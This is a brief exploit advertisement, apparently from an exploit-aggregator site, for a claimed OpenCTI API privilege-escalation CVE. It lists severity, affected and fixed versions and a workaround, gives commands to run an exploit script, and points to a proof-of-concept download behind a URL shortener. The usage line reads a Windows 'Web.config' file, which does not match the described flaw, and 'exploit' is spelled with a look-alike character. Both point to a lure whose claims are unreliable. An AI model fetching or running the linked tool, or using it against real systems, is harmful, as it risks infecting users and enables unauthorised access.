## https://sploitus.com/exploit?id=4FDFA67C-0967-579A-852D-02E20B342BC2
# CVE-2026-27960
### Overview
The OpenCTI platform suffers from a privilege escalation vulnerability that permits unauthenticated attackers to exploit the API and access it as any existing user, including the default administrator.
### Published Date
5 May 2026
### Key Points
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
- **Privileges Required**: None
### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)
### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target --file "/path/to/Web.config"`
### How It Works
This vulnerability affects versions 6.6.0 through 6.9.12. Users are encouraged to upgrade to version 6.9.13, which contains the necessary fixes. Additionally, disabling the default admin account using the APP__ADMIN__EXTERNALLY_MANAGED configuration is recommended as a temporary workaround to enhance security.
### Ethical Use Warning
- This script is a proof-of-concept for CVE-2026-27960 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
### PoC explоit download [here](https://tinyurl.com/2s47k4a5)